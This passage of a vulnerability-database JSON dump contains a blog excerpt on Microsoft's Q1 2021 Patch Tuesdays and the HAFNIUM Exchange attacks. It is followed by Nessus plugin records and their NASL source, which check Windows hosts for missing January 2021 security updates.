For example, by HAFNIUM.\n\n"Hafnium is a state-sponsored threat actor identified by the Microsoft Threat Intelligence Center (MSTIC)".\n\n"Recently, Hafnium has engaged in a number of attacks using previously unknown exploits targeting on-premises Exchange Server software. To date, Hafnium is the primary actor we\u2019ve seen use these exploits, which are discussed in detail [by MSTIC here](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>). The attacks included three steps. First, it would gain access to an Exchange Server either with stolen passwords or by using the previously undiscovered vulnerabilities to disguise itself as someone who should have access. Second, it would create what\u2019s called a web shell to control the compromised server remotely. Third, it would use that remote access \u2013 run from the U.S.-based private servers \u2013 to steal data from an organization\u2019s network."\n\nIn short, these Exchange vulnerabilities are the top.\n\nThe rest are Chrome vulnerabilities, simply because Microsoft's browser is now based on Chrome.\n\nYou can download full versions of reports here:\n\n * [ms_patch_tuesday_january2021](<http://avleonov.com/vulristics_reports/ms_patch_tuesday_january2021_report_avleonov_comments.html>)\n * [ms_patch_tuesday_february2021](<http://avleonov.com/vulristics_reports/ms_patch_tuesday_february2021_report_avleonov_comments.html>)\n * [ms_patch_tuesday_march2021](<http://avleonov.com/vulristics_reports/ms_patch_tuesday_march2021_report_avleonov_comments.html>)\n * [ms_patch_tuesday_other_Q1_2021](<http://avleonov.com/vulristics_reports/ms_patch_tuesday_other_Q1_2021_report_avleonov_comments.html>)\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, 
"privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-03-26T02:47:52", "type": "avleonov", "title": "Vulristics: Microsoft Patch Tuesdays Q1 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0986", "CVE-2020-1350", "CVE-2021-1647", "CVE-2021-1648", "CVE-2021-1658", "CVE-2021-1660", "CVE-2021-1664", "CVE-2021-1666", "CVE-2021-1667", "CVE-2021-1669", "CVE-2021-1671", "CVE-2021-1673", "CVE-2021-1698", "CVE-2021-1700", "CVE-2021-1701", "CVE-2021-1730", "CVE-2021-1732", "CVE-2021-24074", "CVE-2021-24078", "CVE-2021-24085", "CVE-2021-24086", "CVE-2021-24094", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26891", "CVE-2021-27065"], "modified": "2021-03-26T02:47:52", "id": "AVLEONOV:13BED8E5AD26449401A37E1273217B9A", "href": "http://feedproxy.google.com/~r/avleonov/~3/poQoyaBweKg/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-01-11T14:40:30", "description": "The remote Windows host is missing security update 4598297 or cumulative update 4598278. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. 
An attacker can exploit this to gain elevated privileges.\n (CVE-2020-17087, CVE-2021-1648, CVE-2021-1649, CVE-2021-1650, CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1661, CVE-2021-1688, CVE-2021-1693, CVE-2021-1694, CVE-2021-1695, CVE-2021-1702, CVE-2021-1704, CVE-2021-1706, CVE-2021-1709)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-1679)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application. (CVE-2021-1674, CVE-2021-1678)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-1656, CVE-2021-1676, CVE-2021-1696, CVE-2021-1699, CVE-2021-1708)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. 
(CVE-2021-1657, CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1665, CVE-2021-1666, CVE-2021-1667, CVE-2021-1668, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701, CVE-2021-1710)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-12T00:00:00", "type": "nessus", "title": "KB4598297: Windows Server 2012 January 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17087", "CVE-2021-1648", "CVE-2021-1649", "CVE-2021-1650", "CVE-2021-1652", "CVE-2021-1653", "CVE-2021-1654", "CVE-2021-1655", "CVE-2021-1656", "CVE-2021-1657", "CVE-2021-1658", "CVE-2021-1659", "CVE-2021-1660", "CVE-2021-1661", "CVE-2021-1664", "CVE-2021-1665", "CVE-2021-1666", "CVE-2021-1667", "CVE-2021-1668", "CVE-2021-1671", "CVE-2021-1673", "CVE-2021-1674", "CVE-2021-1676", "CVE-2021-1678", "CVE-2021-1679", "CVE-2021-1688", "CVE-2021-1693", "CVE-2021-1694", "CVE-2021-1695", "CVE-2021-1696", "CVE-2021-1699", "CVE-2021-1700", "CVE-2021-1701", "CVE-2021-1702", "CVE-2021-1704", "CVE-2021-1706", "CVE-2021-1708", "CVE-2021-1709", "CVE-2021-1710"], "modified": "2022-12-07T00:00:00", "cpe": 
["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JAN_4598278.NASL", "href": "https://www.tenable.com/plugins/nessus/144881", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144881);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\n \"CVE-2020-17087\",\n \"CVE-2021-1648\",\n \"CVE-2021-1649\",\n \"CVE-2021-1650\",\n \"CVE-2021-1652\",\n \"CVE-2021-1653\",\n \"CVE-2021-1654\",\n \"CVE-2021-1655\",\n \"CVE-2021-1656\",\n \"CVE-2021-1657\",\n \"CVE-2021-1658\",\n \"CVE-2021-1659\",\n \"CVE-2021-1660\",\n \"CVE-2021-1661\",\n \"CVE-2021-1664\",\n \"CVE-2021-1665\",\n \"CVE-2021-1666\",\n \"CVE-2021-1667\",\n \"CVE-2021-1668\",\n \"CVE-2021-1671\",\n \"CVE-2021-1673\",\n \"CVE-2021-1674\",\n \"CVE-2021-1676\",\n \"CVE-2021-1678\",\n \"CVE-2021-1679\",\n \"CVE-2021-1688\",\n \"CVE-2021-1693\",\n \"CVE-2021-1694\",\n \"CVE-2021-1695\",\n \"CVE-2021-1696\",\n \"CVE-2021-1699\",\n \"CVE-2021-1700\",\n \"CVE-2021-1701\",\n \"CVE-2021-1702\",\n \"CVE-2021-1704\",\n \"CVE-2021-1706\",\n \"CVE-2021-1708\",\n \"CVE-2021-1709\",\n \"CVE-2021-1710\"\n );\n script_xref(name:\"MSKB\", value:\"4598278\");\n script_xref(name:\"MSKB\", value:\"4598297\");\n script_xref(name:\"MSFT\", value:\"MS21-4598278\");\n script_xref(name:\"MSFT\", value:\"MS21-4598297\");\n script_xref(name:\"IAVA\", value:\"2021-A-0023-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0001\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0135\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"KB4598297: Windows Server 2012 January 2021 Security Update\");\n\n 
script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4598297\nor cumulative update 4598278. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2020-17087, CVE-2021-1648, CVE-2021-1649, \n CVE-2021-1650, CVE-2021-1652, CVE-2021-1653, \n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, \n CVE-2021-1661, CVE-2021-1688, CVE-2021-1693, \n CVE-2021-1694, CVE-2021-1695, CVE-2021-1702, \n CVE-2021-1704, CVE-2021-1706, CVE-2021-1709)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-1679)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1674,\n CVE-2021-1678)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1656, CVE-2021-1676,\n CVE-2021-1696, CVE-2021-1699, CVE-2021-1708)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. 
(CVE-2021-1657,\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664,\n CVE-2021-1665, CVE-2021-1666, CVE-2021-1667,\n CVE-2021-1668, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700, CVE-2021-1701, CVE-2021-1710)\");\n # https://support.microsoft.com/en-us/help/4598278/windows-server-2012-update\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bbb76f59\");\n # https://support.microsoft.com/en-us/help/4598297/windows-server-2012-update\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b71d9485\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4598297 or Cumulative Update KB4598278.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1668\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-1694\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This 
script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS21-01\";\nkbs = make_list('4598278', '4598297'); # changed by manual execution of PT scriptsautomation\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date:\"01_2021\",\n bulletin:bulletin,\n rollup_kb_list:[4598297, 4598278])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:38:14", "description": "The remote Windows host is missing security update 4598275 or cumulative update 4598285. It is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability. 
An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-1637, CVE-2021-1656, CVE-2021-1676, CVE-2021-1696, CVE-2021-1699, CVE-2021-1708)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1648, CVE-2021-1649, CVE-2021-1650, CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1661, CVE-2021-1688, CVE-2021-1693, CVE-2021-1694, CVE-2021-1695, CVE-2021-1702, CVE-2021-1704, CVE-2021-1706, CVE-2021-1709)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application. (CVE-2021-1674, CVE-2021-1678, CVE-2021-1683, CVE-2021-1684)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-1679, CVE-2021-1692)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. 
(CVE-2021-1657, CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1665, CVE-2021-1666, CVE-2021-1667, CVE-2021-1668, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701, CVE-2021-1710)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-12T00:00:00", "type": "nessus", "title": "KB4598275: Windows 8.1 and Windows Server 2012 R2 January 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1637", "CVE-2021-1648", "CVE-2021-1649", "CVE-2021-1650", "CVE-2021-1652", "CVE-2021-1653", "CVE-2021-1654", "CVE-2021-1655", "CVE-2021-1656", "CVE-2021-1657", "CVE-2021-1658", "CVE-2021-1659", "CVE-2021-1660", "CVE-2021-1661", "CVE-2021-1664", "CVE-2021-1665", "CVE-2021-1666", "CVE-2021-1667", "CVE-2021-1668", "CVE-2021-1671", "CVE-2021-1673", "CVE-2021-1674", "CVE-2021-1676", "CVE-2021-1678", "CVE-2021-1679", "CVE-2021-1683", "CVE-2021-1684", "CVE-2021-1688", "CVE-2021-1692", "CVE-2021-1693", "CVE-2021-1694", "CVE-2021-1695", "CVE-2021-1696", "CVE-2021-1699", "CVE-2021-1700", "CVE-2021-1701", "CVE-2021-1702", "CVE-2021-1704", "CVE-2021-1706", "CVE-2021-1708", 
"CVE-2021-1709", "CVE-2021-1710"], "modified": "2022-12-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JAN_4598275.NASL", "href": "https://www.tenable.com/plugins/nessus/144888", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144888);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\n \"CVE-2021-1637\",\n \"CVE-2021-1648\",\n \"CVE-2021-1649\",\n \"CVE-2021-1650\",\n \"CVE-2021-1652\",\n \"CVE-2021-1653\",\n \"CVE-2021-1654\",\n \"CVE-2021-1655\",\n \"CVE-2021-1656\",\n \"CVE-2021-1657\",\n \"CVE-2021-1658\",\n \"CVE-2021-1659\",\n \"CVE-2021-1660\",\n \"CVE-2021-1661\",\n \"CVE-2021-1664\",\n \"CVE-2021-1665\",\n \"CVE-2021-1666\",\n \"CVE-2021-1667\",\n \"CVE-2021-1668\",\n \"CVE-2021-1671\",\n \"CVE-2021-1673\",\n \"CVE-2021-1674\",\n \"CVE-2021-1676\",\n \"CVE-2021-1678\",\n \"CVE-2021-1679\",\n \"CVE-2021-1683\",\n \"CVE-2021-1684\",\n \"CVE-2021-1688\",\n \"CVE-2021-1692\",\n \"CVE-2021-1693\",\n \"CVE-2021-1694\",\n \"CVE-2021-1695\",\n \"CVE-2021-1696\",\n \"CVE-2021-1699\",\n \"CVE-2021-1700\",\n \"CVE-2021-1701\",\n \"CVE-2021-1702\",\n \"CVE-2021-1704\",\n \"CVE-2021-1706\",\n \"CVE-2021-1708\",\n \"CVE-2021-1709\",\n \"CVE-2021-1710\"\n );\n script_xref(name:\"MSKB\", value:\"4598285\");\n script_xref(name:\"MSKB\", value:\"4598275\");\n script_xref(name:\"MSFT\", value:\"MS21-4598285\");\n script_xref(name:\"MSFT\", value:\"MS21-4598275\");\n script_xref(name:\"IAVA\", value:\"2021-A-0023-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0001\");\n\n script_name(english:\"KB4598275: Windows 8.1 and Windows Server 2012 R2 January 2021 Security Update\");\n\n 
script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4598275\nor cumulative update 4598285. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1637, CVE-2021-1656,\n CVE-2021-1676, CVE-2021-1696, CVE-2021-1699,\n CVE-2021-1708)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1648, CVE-2021-1649, CVE-2021-1650,\n CVE-2021-1652, CVE-2021-1653, CVE-2021-1654,\n CVE-2021-1655, CVE-2021-1659, CVE-2021-1661,\n CVE-2021-1688, CVE-2021-1693, CVE-2021-1694,\n CVE-2021-1695, CVE-2021-1702, CVE-2021-1704,\n CVE-2021-1706, CVE-2021-1709)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1674,\n CVE-2021-1678, CVE-2021-1683, CVE-2021-1684)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-1679,\n CVE-2021-1692)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. 
(CVE-2021-1657,\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664,\n CVE-2021-1665, CVE-2021-1666, CVE-2021-1667,\n CVE-2021-1668, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700, CVE-2021-1701, CVE-2021-1710)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4598285/windows-8-1-update\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4598275/windows-8-1-update\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4598275 or Cumulative Update KB4598285.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1668\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-1694\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-01';\nkbs = make_list(\n '4598275',\n '4598285'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.3', \n sp:0,\n rollup_date:'01_2021',\n bulletin:bulletin,\n rollup_kb_list:[4598275, 4598285])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-04T14:37:24", "description": "The remote Windows host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1685. (CVE-2021-1642)\n\n - Windows DNS Query Information Disclosure Vulnerability (CVE-2021-1637)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1680. 
(CVE-2021-1651)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1652)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1653)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1654)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1655)\n\n - TPM Device Driver Information Disclosure Vulnerability (CVE-2021-1656)\n\n - Windows Fax Compose Form Remote Code Execution Vulnerability (CVE-2021-1657)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1658)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1659)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. 
(CVE-2021-1660)\n\n - Windows Installer Elevation of Privilege Vulnerability (CVE-2021-1661)\n\n - Windows Event Tracing Elevation of Privilege Vulnerability (CVE-2021-1662)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1664)\n\n - GDI+ Remote Code Execution Vulnerability (CVE-2021-1665)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1666)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1667)\n\n - Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability (CVE-2021-1668)\n\n - Windows Remote Desktop Security Feature Bypass Vulnerability (CVE-2021-1669)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1671)\n\n - Windows Projected File System FS Filter Driver Information Disclosure Vulnerability This CVE ID is unique from CVE-2021-1663, CVE-2021-1670. (CVE-2021-1672)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1700, CVE-2021-1701. 
